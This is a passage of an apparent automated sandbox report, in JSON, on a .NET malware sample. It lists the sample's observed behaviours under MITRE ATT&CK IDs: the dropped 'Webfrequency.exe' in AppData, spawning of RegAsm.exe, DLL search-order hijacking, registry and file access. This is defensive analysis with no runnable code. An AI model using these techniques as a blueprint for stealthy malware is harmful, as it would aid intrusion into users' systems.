\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"amsi.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"Webfrequency.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"amsi.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"RegAsm.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BC0000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BC0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77BC0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64950000\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 65100000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 65100000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64950000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64950000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 6A1D0000\n \"RegAsm.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69A20000\n \"Webfrequency.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69A40000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"Webfrequency.exe\" (UID: 00000000-00001812)\n Spawned process \"RegAsm.exe\" (UID: 00000000-00000352)\n Spawned process \"Webfrequency.exe\" (UID: 00000000-00004536)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"Webfrequency.exe\" (UID: 00000000-00001812)\n Spawned process \"RegAsm.exe\" (UID: 00000000-00000352)\n Spawned process \"Webfrequency.exe\" (UID: 00000000-00004536)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"Webfrequency.exe\" (UID: 00000000-00004536) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"Webfrequency.exe\" (UID: 00000000-00004536) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" was detected as \".NET\" and name: \"Library\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Webfrequency.exe\" was detected as \".NET\" and name: \"Library\"\n \"Webfrequency.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"Webfrequency.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"Webfrequency.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"Webfrequency.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"Webfrequency.exe\" - Location: [%APPDATA%\\Webdevelop\\Webfrequency.exe]- [targetUID: 00000000-00002568]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibrary\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00002568.00000001.186418.00570000.00000004.mdmp, 00000000-00002568.00000001.186418.01C90000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"Webfrequency.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"Webfrequency.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"Webfrequency.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"Webfrequency.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"Webfrequency.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"Webfrequency.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\CustomMarshalers\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\CustomMarshalers.dll.config\"\n \"RegAsm.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\System.pdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" connecting to \"\\ThemeApiPort\"\n \"Webfrequency.exe\" connecting to \"\\ThemeApiPort\"\n \"RegAsm.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe\" 